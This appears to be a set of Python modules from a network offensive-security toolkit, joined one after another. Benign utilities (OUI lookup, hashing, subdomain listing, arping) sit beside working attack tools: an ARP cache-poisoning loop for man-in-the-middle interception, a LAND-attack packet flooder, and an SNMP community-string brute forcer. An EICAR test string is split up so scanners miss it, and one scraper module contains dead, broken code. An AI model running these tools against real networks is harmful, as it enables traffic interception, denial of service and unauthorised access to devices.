import click
from scapy.all import ICMP, IP, conf, sr1, UDP, TCP, Ether, BOOTP, DHCP, get_if_raw_hwaddr, RandMAC, srp, DHCP_am
from time import sleep

@click.command()
@click.option('-i', 'iface', default=None, help='Interface to use')
#@click.option('-g', 'gateway', default=None, help='Gateway (default: interface address)')
#@click.option('-d', 'dns', default=None, help='DNS (default: interface address)')
#@click.option('-p', 'pool', default=None, help='Address pool (default: interface network)')
#@click.option('-m', 'mask', default=None, help='Network mask (default: interface network mask)')
@click.option('-v', 'verbose', is_flag=True, default=False, help='Verbose output')
def cmd_dhcp_server(iface, verbose):

    conf.verb = False

    if iface:
        conf.iface = iface

    #print(conf)

    '''
    dhcp_server = DHCP_am(
                            iface=conf.iface,
                            domain='example.com',
                            pool=Net('192.168.10.0/24'),
                            network='192.168.10.0/24',
                            gw='192.168.10.254',
                            renewal_time=600, lease_time=3600
                        )
    dhcp_server()
    '''
    print(conf.route)

if __name__ == '__main__':
    cmd_dhcp_server()




#!/usr/bin/env python

# manuf.py: Parser library for Wireshark's OUI database.
# Copyright (c) 2016 Michael Huang
#
# This library is free software. It is dual licensed under the terms of the GNU Lesser General
# Public License version 3.0 (or any later version) and the Apache License version 2.0.
#
# For more information, see:
#
# <http://www.gnu.org/licenses/>
# <http://www.apache.org/licenses/>
"""Parser library for Wireshark's OUI database.

Converts MAC addresses into a manufacturer using Wireshark's OUI database.

See README.md.

"""
from __future__ import print_function
from collections import namedtuple
import argparse
import re
import sys
import io
import os

try:
    from urllib2 import urlopen
    from urllib2 import URLError
except ImportError:
    from urllib.request import urlopen
    from urllib.error import URLError

try:
    from StringIO import StringIO
except ImportError:
    from io import StringIO

# Vendor tuple
Vendor = namedtuple('Vendor', ['manuf', 'comment'])


FILEDIR = os.path.dirname(os.path.abspath(__file__))
DATADIR = os.path.abspath(os.path.join(FILEDIR, '../data'))
MANUFILE = os.path.abspath(os.path.join(DATADIR, 'manuf.txt'))
MANUF_URL = "https://code.wireshark.org/review/gitweb?p=wireshark.git;a=blob_plain;f=manuf"


class MacParser(object):
    """Class that contains a parser for Wireshark's OUI database.

    Optimized for quick lookup performance by reading the entire file into memory on
    initialization. Maps ranges of MAC addresses to manufacturers and comments (descriptions).
    Contains full support for netmasks and other strange things in the database.

    See https://www.wireshark.org/tools/oui-lookup.html

    Args:
        update (bool): Whether to update the manuf file automatically. Defaults to False.

    Raises:
        IOError: If manuf file could not be found.

    """

    def  __init__(self, update=False):

        self.manufile = MANUFILE
        self.manuf_url = MANUF_URL

        if update:
            self.update()
        else:
            self.refresh()

    def refresh(self):
        """Refresh/reload manuf database. Call this when manuf file is updated.

        Raises:
            IOError: If manuf file could not be found.

        """
        with io.open(self.manufile, "r", encoding="utf-8") as read_file:
            manuf_file = StringIO(read_file.read())
        self._masks = {}

        # Build mask -> result dict
        for line in manuf_file:
            com = line.split("#", 1)
            arr = com[0].split()

            if len(arr) < 1:
                continue

            parts = arr[0].split("/")
            mac_str = self._strip_mac(parts[0])
            mac_int = self._get_mac_int(mac_str)
            mask = self._bits_left(mac_str)

            # Specification includes mask
            if len(parts) > 1:
                mask_spec = 48 - int(parts[1])
                if mask_spec > mask:
                    mask = mask_spec

            if len(com) > 1:
                result = Vendor(manuf=arr[1], comment=com[1].strip())
            else:
                result = Vendor(manuf=arr[1], comment=None)

            self._masks[(mask, mac_int >> mask)] = result

        manuf_file.close()

    def update(self, refresh=True):
        """Update the Wireshark OUI database to the latest version.

        Args:
            manuf_url (str): URL pointing to OUI database. Defaults to database located at
                code.wireshark.org.
            refresh (bool): Refresh the database once updated. Defaults to True.

        Raises:
            URLError: If the download fails

        """

        # Retrieve the new database
        try:
            response = urlopen(self.manuf_url)
        except URLError:
            raise URLError("Failed downloading OUI database")

        # Parse the response
        if response.code is 200:
            with open(self.manufile, "wb") as write_file:
                write_file.write(response.read())
            if refresh:
                self.refresh()
        else:
            err = "{0} {1}".format(response.code, response.msg)
            raise URLError("Failed downloading database: {0}".format(err))

        response.close()

    def search(self, mac, maximum=1):
        """Search for multiple Vendor tuples possibly matching a MAC address.

        Args:
            mac (str): MAC address in standard format.
            maximum (int): Maximum results to return. Defaults to 1.

        Returns:
            List of Vendor namedtuples containing (manuf, comment), with closest result first. May
            be empty if no results found.

        Raises:
            ValueError: If the MAC could not be parsed.

        """
        vendors = []
        if maximum <= 0:
            return vendors
        mac_str = self._strip_mac(mac)
        mac_int = self._get_mac_int(mac_str)

        # If the user only gave us X bits, check X bits. No partial matching!
        for mask in range(self._bits_left(mac_str), 48):
            result = self._masks.get((mask, mac_int >> mask))
            if result:
                vendors.append(result)
                if len(vendors) >= maximum:
                    break
        return vendors

    def get_all(self, mac):
        """Get a Vendor tuple containing (manuf, comment) from a MAC address.

        Args:
            mac (str): MAC address in standard format.

        Returns:
            Vendor: Vendor namedtuple containing (manuf, comment). Either or both may be None if
            not found.

        Raises:
            ValueError: If the MAC could not be parsed.

        """
        vendors = self.search(mac)
        if len(vendors) == 0:
            return Vendor(manuf=None, comment=None)
        return vendors[0]

    def get_manuf(self, mac):
        """Returns manufacturer from a MAC address.

        Args:
            mac (str): MAC address in standard format.

        Returns:
            string: String containing manufacturer, or None if not found.

        Raises:
            ValueError: If the MAC could not be parsed.

        """
        return self.get_all(mac).manuf

    def get_comment(self, mac):
        """Returns comment from a MAC address.

        Args:
            mac (str): MAC address in standard format.

        Returns:
            string: String containing comment, or None if not found.

        Raises:
            ValueError: If the MAC could not be parsed.

        """
        return self.get_all(mac).comment

    # Gets the integer representation of a stripped mac string
    def _get_mac_int(self, mac_str):
        try:
            # Fill in missing bits with zeroes
            return int(mac_str, 16) << self._bits_left(mac_str)
        except ValueError:
            raise ValueError("Could not parse MAC: {0}".format(mac_str))

    # Regular expression that matches '-', ':', and '.' characters
    _pattern = re.compile(r"[-:\.]")

    # Strips the MAC address of '-', ':', and '.' characters
    def _strip_mac(self, mac):
        return self._pattern.sub("", mac)

    # Gets the number of bits left in a mac string
    @staticmethod
    def _bits_left(mac_str):
        return 48 - 4 * len(mac_str)





import hashlib

ALGOS = [
    'md5',
    'sha1',
    'sha512',
    'ripemd160',
    'whirlpool',
]


def hasher(data, algos=ALGOS):

    try:
        data = data.encode()
    except Exception:
        pass

    result = {}

    for algo in sorted(hashlib.algorithms_available):
        if algo in algos:
            h = hashlib.new(algo)
            h.update(data)
            result[algo] = h.hexdigest()

    return result


if __name__ == '__main__':
    from pprint import pprint
    pprint(hasher('password'))




import logging
import re

import click
import requests
import requests_cache
import sys
import json
from pprint import pprint
import regex as re
from bs4 import BeautifulSoup

requests_cache.install_cache('/tmp/habu_requests_cache')

@click.command()
@click.argument('url')
@click.option('-c', 'no_cache', is_flag=True, default=False, help='Disable cache')
@click.option('-v', 'verbose', is_flag=True, default=False, help='Verbose output')
def cmd_weburls(url, no_cache, verbose):

    if verbose:
        logging.basicConfig(level=logging.INFO, format='%(message)s')

    #if not no_cache:
    #    requests_cache.install_cache('/tmp/habu_requests_cache')


    search(url)

    sys.exit(0)

    with open('../data/apps.json') as f:
        data = json.load(f)

    apps = data['apps']
    categories = data['categories']

    # convertir los strings a listas, para que siempre los valores sean listas
    for app in apps:
        for field in ['url', 'html', 'env', 'script', 'implies', 'excludes']:

            if field in apps[app]:
                if type(apps[app][field]) != type([]):
                    apps[app][field] = [apps[app][field]]

    for app in apps:

        for url_regex in apps[app].get('url', []):
            match = re.search(url_regex, url, flags=re.IGNORECASE & re.MULTILINE)
            if match:
                print("{app} detected by URL with regex {regex}".format(app=app, regex=url_regex))
                if not app in tech:
                    tech[app] = apps[app]

    for t in list(tech.keys()):
        for imply in tech[t].get('implies', []):
            print(imply, "detected because implied by", t)
            tech[imply] = apps[imply]

    for t in tech:
        tech[t]['category'] = categories[tech[t]['cats'][0]]['name']

    for t in list(tech.keys()):
        for exclude in tech[t].get('excludes', []):
            print("removing", exclude)
            del(tech[t])

    pprint(tech)



def search(domain):
    q="site:{}".format(domain)

    server = "www.google.com"
    userAgent = "(Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"

    headers = {
        'Host': server,
        'Cookie': 'SRCHHPGUSR=ADLT=DEMOTE&NRSLT=50',
        'User-Agent': userAgent,
        'Accept-Language': 'en-us,en',
    }

    for counter in range(5):

        url = "https://" + server + "/search?&start=" + str(counter) + "&hl=en&meta=&q=%40\"" + q + "\""
        r = requests.get(url, headers=headers)
        #returncode, returnmsg, headers = h.getreply()
        #self.results = h.getfile().read()
        results = r.text
        soup = BeautifulSoup(results, 'html.parser')
        for a in soup.find_all('a'):
            if a['href'].startswith('/url?q='):
                url = a['href']
                url = url.split('&')[0].replace('/url?q=', '')
                #url = url.split('/')[2]

                print(url)
                #if 'Perfil profesional' in a.text:
                #    linkedin_url = a['href'].split('&')[0].replace('/url?q=', '')
                #    name = a.text.split('|')[0].strip()
                #    print(email, name, linkedin_url)
                #    return { 'name': name, 'linkedin_url': linkedin_url }
                #    break
    return None
    #pprint(results)


if __name__ == '__main__':
    cmd_weburls()



import os
import sys
from pathlib import Path

import click

from scapy.all import ASN1_OID, IP, SNMP, UDP, SNMPget, SNMPvarbind, conf, sr1

@click.command()
@click.argument('ip')
@click.option('-p', 'port', default=161, help='Port to use')
@click.option('-s', 'stop', is_flag=True, default=False, help='Stop after first match')
@click.option('-v', 'verbose', is_flag=True, default=False, help='Verbose')
def cmd_snmp_crack(ip, port, stop, verbose):

    FILEDIR = os.path.dirname(os.path.abspath(__file__))
    DATADIR = os.path.abspath(os.path.join(FILEDIR, '../data'))
    COMMFILE = Path(os.path.abspath(os.path.join(DATADIR, 'dict_snmp.txt')))

    with COMMFILE.open() as cf:
        communities = cf.read().split('\n')

    conf.verb = False

    pkt = IP(dst=ip)/UDP(sport=port, dport=port)/SNMP(community="public", PDU=SNMPget(varbindlist=[SNMPvarbind(oid=ASN1_OID("1.3.6.1"))]))

    for community in communities:

        if verbose:
            print('.', end='')
            sys.stdout.flush()

        pkt[SNMP].community=community
        ans = sr1(pkt, timeout=0.5, verbose=0)

        if ans and UDP in ans:
            print('\nCommunity found:', community)
            if stop:
                break

    return True

if __name__ == '__main__':
    cmd_snmp_crack()



import time

import click

from scapy.all import ARP, Ether, conf, getmacbyip, sendp


@click.command()
@click.argument('t1')
@click.argument('t2')
@click.option('-i', 'iface', default=None, help='Interface to use')
@click.option('-v', 'verbose', is_flag=True, default=False, help='Verbose')
def cmd_arpoison(t1, t2, iface, verbose):
    """ARP cache poison"""

    conf.verb = False

    if iface:
        conf.iface = iface

    mac1 = getmacbyip(t1)
    mac2 = getmacbyip(t2)

    pkt1 = Ether(dst=mac1)/ARP(op="is-at", psrc=t2, pdst=t1, hwdst=mac1)
    pkt2 = Ether(dst=mac2)/ARP(op="is-at", psrc=t1, pdst=t2, hwdst=mac2)

    try:
        while 1:
            sendp(pkt1)
            sendp(pkt2)

            if verbose:
                pkt1.show2()
                pkt2.show2()
            else:
                print(pkt1.summary())
                print(pkt2.summary())

            time.sleep(1)

    except KeyboardInterrupt:
        pass

if __name__ == '__main__':
    cmd_arpoison()



import click
from scapy.all import TCP, IP, conf, send
from time import sleep
import sys

@click.command()
@click.argument('ip')
@click.option('-c', 'count', default=0, help='How many packets send (default: infinit)')
@click.option('-p', 'port', default=135, help='Port to use (default: 135)')
@click.option('-i', 'iface', default=None, help='Interface to use')
@click.option('-v', 'verbose', is_flag=True, default=False, help='Verbose')
def cmd_land(ip, count, port, iface, verbose):

    conf.verb = False

    if iface:
        conf.iface = iface

    layer3 = IP()
    layer3.dst = ip
    layer3.src = ip

    layer4 = TCP()
    layer4.dport = port
    layer4.sport = port

    pkt = layer3 / layer4

    counter = 0

    while True:
        send(pkt)
        counter += 1

        if verbose:
            print(pkt.summary())
        else:
            print('.', end='')
            sys.stdout.flush()

        if count != 0 and counter == count:
            break

    return True

if __name__ == '__main__':
    cmd_land()



# based on code from https://github.com/UnaPibaGeek/ctfr

import json
import logging

import click
import requests
import requests_cache

from habu.lib.dns import query_bulk

requests_cache.install_cache('/tmp/habu_requests_cache')

@click.command()
@click.argument('domain')
@click.option('-c', 'no_cache', is_flag=True, default=False, help='Disable cache')
@click.option('-n', 'no_validate', is_flag=True, default=False, help='Disable DNS subdomain validation')
@click.option('-v', 'verbose', is_flag=True, default=False, help='Verbose output')
def cmd_ctfr(domain, no_cache, no_validate, verbose):

    if verbose:
        logging.basicConfig(level=logging.INFO, format='%(message)s')

    if not no_cache:
        requests_cache.install_cache('/tmp/habu_requests_cache')

    subdomains = set()

    req = requests.get("https://crt.sh/?q=%.{d}&output=json".format(d=domain))

    if req.status_code != 200:
        print("[X] Information not available!")
        exit(1)

    json_data = json.loads('[{}]'.format(req.text.replace('}{', '},{')))

    for data in json_data:
        name = data['name_value'].lower()
        if '*' not in name:
            subdomains.add(name)

    subdomains = list(subdomains)

    if no_validate:
        print(json.dumps(sorted(subdomains), indent=4))
        return True

    answers = query_bulk(subdomains)

    validated = []

    for answer in answers:
        if answer:
            validated.append(str(answer.qname))

    print(json.dumps(sorted(validated), indent=4))
    return True


if __name__ == '__main__':
    cmd_ctfr()



import logging
import re
from time import sleep

import click

from scapy.all import ARP, IP, TCP, Ether, conf, srp


@click.command()
@click.argument('ip')
@click.option('-i', 'iface', default=None, help='Interface to use')
@click.option('-v', 'verbose', is_flag=True, default=False, help='Verbose output')
def cmd_arping(ip, iface, verbose):

    if verbose:
        logging.basicConfig(level=logging.INFO, format='%(message)s')

    conf.verb = False

    if iface:
        conf.iface = iface

    res, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip), timeout=2)
    res.show()

if __name__ == '__main__':
    cmd_arping()




import json
import logging
import sys
from pprint import pprint
import os.path

import click
import regex as re
import requests
import requests_cache
from bs4 import BeautifulSoup
from pathlib import Path

def extract_ip(data):

    regexp = re.compile(r'^((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$', flags=re.MULTILINE)

    match = regexp.finditer(data)

    result = []
    for m in match:
        result.append(m.group(0))

    return result

supported = [
    'ip',
]

@click.command()
@click.argument('infile', type=click.File('r'), default='-')
@click.option('-v', 'verbose', is_flag=True, default=False, help='Verbose output')
@click.option('-j', 'jsonout', is_flag=True, default=False, help='JSON output')
@click.option('-w', 'what', default='ip', type=click.Choice(supported), help='What do you want to extract')
def cmd_extract(infile, verbose, jsonout, what):

    if verbose:
        logging.basicConfig(level=logging.INFO, format='%(message)s')

    data = infile.read()

    result = []

    functions = {
        'ip' : [ extract_ip ]
    }

    for f in functions[what]:
        #print(f)
        result += f(data)

    result = sorted(set(result))

    if jsonout:
        print(json.dumps(result, indent=4))
    else:
        print('\n'.join(result))


if __name__ == '__main__':
    cmd_extract()





remove_underscores = 'X5O_!P%@_AP[4_\PZX_54(P_^)7C_C)7}_$EIC_AR-S_TAND_ARD-_ANTI_VIRU_S-TE_ST-F_ILE!_$H+H_*'

def eicar():
    return(remove_underscores.replace('_', ''))

if __name__ == '__main__':
    print(eicar())



import click
import sys
import logging
from habu.lib.ip2asn import ip2asn
import json

@click.command()
@click.argument('ip')
def cmd_ip2asn(ip):

    data = ip2asn(ip)
    print(json.dumps(data, indent=4))

if __name__ == '__main__':
    cmd_ip2asn()

